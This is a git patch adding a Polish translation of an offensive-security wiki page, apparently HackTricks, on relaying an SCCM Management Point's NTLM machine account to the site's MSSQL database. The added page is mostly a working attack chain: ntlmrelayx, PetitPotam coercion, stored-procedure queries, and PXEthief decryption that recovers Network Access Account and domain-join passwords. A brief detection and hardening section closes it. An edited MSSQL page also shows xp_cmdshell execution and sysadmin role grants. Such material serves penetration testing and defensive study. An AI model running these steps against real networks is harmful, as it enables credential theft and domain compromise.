From 3865bf190af127e7d2f133ab56884f00989cd026 Mon Sep 17 00:00:00 2001 From: Translator Date: Tue, 22 Jul 2025 08:30:53 +0000 Subject: [PATCH] Translated ['src/windows-hardening/active-directory-methodology/abusing- --- src/SUMMARY.md | 1 + .../abusing-ad-mssql.md | 12 +- ...nagement-point-relay-sql-policy-secrets.md | 155 ++++++++++++++++++ 3 files changed, 165 insertions(+), 3 deletions(-) create mode 100644 src/windows-hardening/active-directory-methodology/sccm-management-point-relay-sql-policy-secrets.md diff --git a/src/SUMMARY.md b/src/SUMMARY.md index b09540790..09ba11160 100644 --- a/src/SUMMARY.md +++ b/src/SUMMARY.md @@ -283,6 +283,7 @@ - [Privileged Groups](windows-hardening/active-directory-methodology/privileged-groups-and-token-privileges.md) - [RDP Sessions Abuse](windows-hardening/active-directory-methodology/rdp-sessions-abuse.md) - [Resource-based Constrained Delegation](windows-hardening/active-directory-methodology/resource-based-constrained-delegation.md) + - [Sccm Management Point Relay Sql Policy Secrets](windows-hardening/active-directory-methodology/sccm-management-point-relay-sql-policy-secrets.md) - [Security Descriptors](windows-hardening/active-directory-methodology/security-descriptors.md) - [SID-History Injection](windows-hardening/active-directory-methodology/sid-history-injection.md) - [Silver Ticket](windows-hardening/active-directory-methodology/silver-ticket.md) diff --git a/src/windows-hardening/active-directory-methodology/abusing-ad-mssql.md b/src/windows-hardening/active-directory-methodology/abusing-ad-mssql.md index 596d5e9d5..d1ada92b4 100644 --- a/src/windows-hardening/active-directory-methodology/abusing-ad-mssql.md +++ b/src/windows-hardening/active-directory-methodology/abusing-ad-mssql.md @@ -166,7 +166,7 @@ Możliwe jest również **wykonywanie poleceń** wewnątrz hosta MSSQL Invoke-SQLOSCmd -Instance "srv.sub.domain.local,1433" -Command "whoami" -RawResults # Invoke-SQLOSCmd automatically checks if xp_cmdshell is enable and enables it if necessary ``` -Sprawdź na stronie wspomnianej w **następującej sekcji, jak zrobić to ręcznie.** +Sprawdź na stronie wspomnianej w **następnym rozdziale, jak zrobić to ręcznie.** ### MSSQL Podstawowe Sztuczki Hackingowe @@ -278,8 +278,14 @@ EXECUTE('EXECUTE(''sp_addsrvrolemember ''''hacker'''' , ''''sysadmin'''' '') AT **Użytkownik lokalny MSSQL** zazwyczaj ma specjalny rodzaj uprawnienia nazywanego **`SeImpersonatePrivilege`**. Umożliwia to kontu "podszywanie się pod klienta po uwierzytelnieniu". -Strategią, którą wielu autorów opracowało, jest zmuszenie usługi SYSTEM do uwierzytelnienia się w fałszywej lub man-in-the-middle usłudze, którą tworzy atakujący. Ta fałszywa usługa jest w stanie podszywać się pod usługę SYSTEM, gdy ta próbuje się uwierzytelnić. +Strategią, którą opracowało wielu autorów, jest zmuszenie usługi SYSTEM do uwierzytelnienia się w fałszywej lub man-in-the-middle usłudze, którą tworzy atakujący. Ta fałszywa usługa może następnie podszywać się pod usługę SYSTEM, gdy ta próbuje się uwierzytelnić. -[SweetPotato](https://github.com/CCob/SweetPotato) ma zbiór tych różnych technik, które można wykonać za pomocą polecenia `execute-assembly` Beacona. +[SweetPotato](https://github.com/CCob/SweetPotato) ma zbiór tych różnych technik, które można wykonać za pomocą polecenia `execute-assembly` w Beaconie. + +### NTLM Relay punktu zarządzania SCCM (ekstrakcja sekretów OSD) +Zobacz, jak domyślne role SQL punktów zarządzania SCCM **Management Points** mogą być wykorzystywane do zrzucania konta dostępu do sieci i sekretów sekwencji zadań bezpośrednio z bazy danych witryny: +{{#ref}} +sccm-management-point-relay-sql-policy-secrets.md +{{#endref}} {{#include ../../banners/hacktricks-training.md}} diff --git a/src/windows-hardening/active-directory-methodology/sccm-management-point-relay-sql-policy-secrets.md b/src/windows-hardening/active-directory-methodology/sccm-management-point-relay-sql-policy-secrets.md new file mode 100644 index 000000000..10f08288e --- /dev/null +++ b/src/windows-hardening/active-directory-methodology/sccm-management-point-relay-sql-policy-secrets.md @@ -0,0 +1,155 @@ +# SCCM Management Point NTLM Relay do SQL – Ekstrakcja sekretów polityki OSD + +{{#include ../../banners/hacktricks-training.md}} + +## TL;DR +Wymuszając **System Center Configuration Manager (SCCM) Management Point (MP)** do uwierzytelnienia przez SMB/RPC i **przekazując** ten NTLM machine account do **bazy danych serwisu (MSSQL)**, uzyskujesz prawa `smsdbrole_MP` / `smsdbrole_MPUserSvc`. Te role pozwalają na wywołanie zestawu procedur składowanych, które ujawniają **Operating System Deployment (OSD)** policy blobs (poświadczenia Network Access Account, zmienne Task-Sequence itp.). Bloby są zakodowane/encrypted w formacie hex, ale mogą być dekodowane i odszyfrowane za pomocą **PXEthief**, co daje jawne sekrety. + +Ogólny schemat: +1. Odkryj MP & bazę danych serwisu ↦ nieautoryzowany punkt końcowy HTTP `/SMS_MP/.sms_aut?MPKEYINFORMATIONMEDIA`. +2. Uruchom `ntlmrelayx.py -t mssql:// -ts -socks`. +3. Wymuś MP używając **PetitPotam**, PrinterBug, DFSCoerce itp. +4. Przez proxy SOCKS połącz się z `mssqlclient.py -windows-auth` jako przekazywane konto **\\$**. +5. Wykonaj: +* `use CM_` +* `exec MP_GetMachinePolicyAssignments N'',N''` +* `exec MP_GetPolicyBody N'',N''` (lub `MP_GetPolicyBodyAfterAuthorization`) +6. Usuń `0xFFFE` BOM, `xxd -r -p` → XML → `python3 pxethief.py 7 `. + +Sekrety takie jak `OSDJoinAccount/OSDJoinPassword`, `NetworkAccessUsername/Password` itp. są odzyskiwane bez dotykania PXE lub klientów. + +--- + +## 1. Enumerowanie nieautoryzowanych punktów końcowych MP +Rozszerzenie ISAPI MP **GetAuth.dll** ujawnia kilka parametrów, które nie wymagają uwierzytelnienia (chyba że serwis jest tylko PKI): + +| Parametr | Cel | +|-----------|---------| +| `MPKEYINFORMATIONMEDIA` | Zwraca publiczny klucz certyfikatu podpisującego serwis + GUIDy urządzeń *x86* / *x64* **All Unknown Computers**. | +| `MPLIST` | Wymienia każdy Management-Point w serwisie. | +| `SITESIGNCERT` | Zwraca certyfikat podpisujący Primary-Site (identyfikuje serwer serwisu bez LDAP). | + +Zbierz GUIDy, które będą działać jako **clientID** do późniejszych zapytań DB: +```bash +curl http://MP01.contoso.local/SMS_MP/.sms_aut?MPKEYINFORMATIONMEDIA | xmllint --format - +``` +--- + +## 2. Przekaż konto maszyny MP do MSSQL +```bash +# 1. Start the relay listener (SMB→TDS) +ntlmrelayx.py -ts -t mssql://10.10.10.15 -socks -smb2support + +# 2. Trigger authentication from the MP (PetitPotam example) +python3 PetitPotam.py 10.10.10.20 10.10.10.99 \ +-u alice -p P@ssw0rd! -d CONTOSO -dc-ip 10.10.10.10 +``` +Kiedy przymus się uruchomi, powinieneś zobaczyć coś takiego: +``` +[*] Authenticating against mssql://10.10.10.15 as CONTOSO/MP01$ SUCCEED +[*] SOCKS: Adding CONTOSO/MP01$@10.10.10.15(1433) +``` +--- + +## 3. Zidentyfikuj polityki OSD za pomocą procedur składowanych +Połącz się przez proxy SOCKS (port 1080 domyślnie): +```bash +proxychains mssqlclient.py CONTOSO/MP01$@10.10.10.15 -windows-auth +``` +Przełącz się na bazę danych **CM_** (użyj 3-cyfrowego kodu lokalizacji, np. `CM_001`). + +### 3.1 Znajdź GUIDy nieznanych komputerów (opcjonalnie) +```sql +USE CM_001; +SELECT SMS_Unique_Identifier0 +FROM dbo.UnknownSystem_DISC +WHERE DiscArchKey = 2; -- 2 = x64, 0 = x86 +``` +### 3.2 Lista przypisanych polityk +```sql +EXEC MP_GetMachinePolicyAssignments N'e9cd8c06-cc50-4b05-a4b2-9c9b5a51bbe7', N''; +``` +Każdy wiersz zawiera `PolicyAssignmentID`, `Body` (hex), `PolicyID`, `PolicyVersion`. + +Skup się na politykach: +* **NAAConfig** – poświadczenia konta dostępu do sieci +* **TS_Sequence** – zmienne sekwencji zadań (OSDJoinAccount/Password) +* **CollectionSettings** – może zawierać konta uruchamiane jako + +### 3.3 Pobierz pełne body +Jeśli już masz `PolicyID` i `PolicyVersion`, możesz pominąć wymaganie clientID, używając: +```sql +EXEC MP_GetPolicyBody N'{083afd7a-b0be-4756-a4ce-c31825050325}', N'2.00'; +``` +> WAŻNE: W SSMS zwiększ „Maksymalną liczbę pobranych znaków” (>65535), w przeciwnym razie blob zostanie obcięty. + +--- + +## 4. Zdekoduj i odszyfruj blob +```bash +# Remove the UTF-16 BOM, convert from hex → XML +echo 'fffe3c003f0078…' | xxd -r -p > policy.xml + +# Decrypt with PXEthief (7 = decrypt attribute value) +python3 pxethief.py 7 $(xmlstarlet sel -t -v "//value/text()" policy.xml) +``` +Przykład odzyskanych sekretów: +``` +OSDJoinAccount : CONTOSO\\joiner +OSDJoinPassword: SuperSecret2025! +NetworkAccessUsername: CONTOSO\\SCCM_NAA +NetworkAccessPassword: P4ssw0rd123 +``` +--- + +## 5. Istotne role i procedury SQL +Po relacji logowanie jest mapowane na: +* `smsdbrole_MP` +* `smsdbrole_MPUserSvc` + +Te role ujawniają dziesiątki uprawnień EXEC, kluczowe używane w tym ataku to: + +| Procedura składowana | Cel | +|----------------------|-----| +| `MP_GetMachinePolicyAssignments` | Lista polityk zastosowanych do `clientID`. | +| `MP_GetPolicyBody` / `MP_GetPolicyBodyAfterAuthorization` | Zwraca pełne ciało polityki. | +| `MP_GetListOfMPsInSiteOSD` | Zwracane przez ścieżkę `MPKEYINFORMATIONMEDIA`. | + +Możesz sprawdzić pełną listę za pomocą: +```sql +SELECT pr.name +FROM sys.database_principals AS dp +JOIN sys.database_permissions AS pe ON pe.grantee_principal_id = dp.principal_id +JOIN sys.objects AS pr ON pr.object_id = pe.major_id +WHERE dp.name IN ('smsdbrole_MP','smsdbrole_MPUserSvc') +AND pe.permission_name='EXECUTE'; +``` +--- + +## 6. Wykrywanie i Wzmacnianie +1. **Monitoruj logowania MP** – każde konto komputera MP logujące się z IP, które nie jest jego hostem ≈ relay. +2. Włącz **Rozszerzoną Ochronę dla Uwierzytelniania (EPA)** w bazie danych witryny (`PREVENT-14`). +3. Wyłącz nieużywany NTLM, wymuś podpisywanie SMB, ogranicz RPC ( +te same środki zaradcze stosowane przeciwko `PetitPotam`/`PrinterBug`). +4. Wzmocnij komunikację MP ↔ DB za pomocą IPSec / mutual-TLS. + +--- + +## Zobacz także +* Podstawy relaying NTLM: +{{#ref}} +../ntlm/README.md +{{#endref}} + +* Nadużycia MSSQL i post-exploitation: +{{#ref}} +abusing-ad-mssql.md +{{#endref}} + + + +## Odniesienia +- [Chciałbym porozmawiać z Twoim menedżerem: Kradzież sekretów za pomocą relayów punktów zarządzania](https://specterops.io/blog/2025/07/15/id-like-to-speak-to-your-manager-stealing-secrets-with-management-point-relays/) +- [PXEthief](https://github.com/MWR-CyberSec/PXEThief) +- [Menadżer Niewłaściwej Konfiguracji – ELEVATE-4 i ELEVATE-5](https://github.com/subat0mik/Misconfiguration-Manager) +{{#include ../../banners/hacktricks-training.md}}